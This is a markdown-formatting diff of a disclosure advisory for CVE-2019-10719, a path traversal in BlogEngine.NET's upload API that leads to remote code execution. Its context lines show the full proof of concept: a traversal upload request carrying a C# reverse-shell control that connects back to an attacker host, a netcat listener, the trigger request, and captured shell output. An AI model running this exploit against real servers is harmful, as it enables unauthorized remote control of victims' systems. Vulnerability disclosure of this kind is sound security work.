Fixing styling on md

--- a/2019-10719/2019-10719.md
+++ b/2019-10719/2019-10719.md
@@ -1,17 +1,17 @@
 A remote code execution (RCE) vulnerability, **CVE-2019-10719**, was discovered in BlogEngine 3.3.7 and earlier.  Leveraging a path traversal in `/api/upload`, a malicious file could be written to a directory which would allow it to be accessed and executed.  **Edit post** permissions are required to upload the shell.  Anyone can trigger the shell without authentication.
 
-### Vendor Patch
+## Vendor Patch
 
 * <https://github.com/rxtur/BlogEngine.NET/releases/tag/v3.3.8.0>
 
-### Timeline
+## Timeline
 
 * 30 Mar 2019 - Issue Identified
 * 31 Mar 2019 - Developer contacted
 * 04 Apr 2019 - Details of vulnerability sent
 * 17 Jun 2019 - Public Disclosure
 
-### Description
+## Description
 
 BlogEngine.NET allows users to upload files through the `/api/upload` endpoint.  Files uploaded using **file**, **filemgr**, or **image** as the `action` ultimately call `BlogService.UploadFile` and create the file:
 
@@ -25,13 +25,13 @@ if (action == "filemgr" || action == "file")
     else
         action = "file";
 }
-<r:snip></r:snip>
+...
 if (action == "image")
 {
     if (Security.IsAuthorizedTo(Rights.EditOwnPosts))
     {
         dir = BlogService.GetDirectory(dirName);
-        var uploaded = <r:b>BlogService.UploadFile(file.InputStream, fileName, dir, true);</r:b>
+        var uploaded = BlogService.UploadFile(file.InputStream, fileName, dir, true);
         return Request.CreateResponse(HttpStatusCode.Created, uploaded.AsImage.ImageUrl);
     }
 }
@@ -40,7 +40,7 @@ if (action == "file")
     if (Security.IsAuthorizedTo(Rights.EditOwnPosts))
     {
         dir = BlogService.GetDirectory(dirName);
-        var uploaded = <r:b>BlogService.UploadFile(file.InputStream, fileName, dir, true);</r:b>
+        var uploaded = BlogService.UploadFile(file.InputStream, fileName, dir, true);
         retUrl = uploaded.FileDownloadPath + "|" + fileName + " (" + BytesToString(uploaded.FileSize) + ")";
         return Request.CreateResponse(HttpStatusCode.Created, retUrl);
     }
@@ -61,12 +61,12 @@ The following will upload the file to **/Custom/Themes/RCE_Test**. **RCE_Test** 
 
 ~~~
 POST /api/upload?action=filemgr&dirPath=%2f..%2f..%2fCustom%2fThemes%2fRCE_Test HTTP/1.1
-Host: <r:var>$RHOST</r:var>
+Host: $RHOST
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
 Accept: text/plain
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
-Cookie: .AUXBLOGENGINE-96d5b379-7e1d-4dac-a6ba-1e50db561b04=<r:redacted>Test</r:redacted>
+Cookie: .AUXBLOGENGINE-96d5b379-7e1d-4dac-a6ba-1e50db561b04=Test
 Connection: close
 Content-Type: multipart/form-data; boundary=---------------------------12143974373743678091868871063
 Content-Length: 2085
@@ -81,7 +81,7 @@ Content-Disposition: form-data; filename="PostView.ascx"
 	static System.IO.StreamWriter streamWriter;
     protected override void OnLoad(EventArgs e) {
         base.OnLoad(e);
-	using(System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("<r:var>$LHOST</r:var>", <r:var>$LPORT</r:var>)) {
+	using(System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("$LHOST", $LPORT)) {
 		using(System.IO.Stream stream = client.GetStream()) {
 			using(System.IO.StreamReader rdr = new System.IO.StreamReader(stream)) {
 				streamWriter = new System.IO.StreamWriter(stream);
@@ -126,7 +126,7 @@ Open a `netcat` listener, `nc -nlvp $LPORT`, and browse to the application root 
 
 ~~~
 GET /?theme=RCE_Test HTTP/1.1
-Host: <r:var>$RHOST</r:var>
+Host: $RHOST
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
@@ -136,8 +136,8 @@ Upgrade-Insecure-Requests: 1
 ~~~
 
 ~~~{command="nc -nlvp $LPORT"}
-listening on [any] <r:var>$LPORT</r:var> ...
-connect to [<r:var>$LHOST</r:var>] from (UNKNOWN) [<r:var>$RHOST</r:var>] 49958
+listening on [any] $LPORT ...
+connect to [$LHOST] from (UNKNOWN) [$RHOST] 49958
 Microsoft Windows [Version 6.1.7601]
 Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
 ~~~
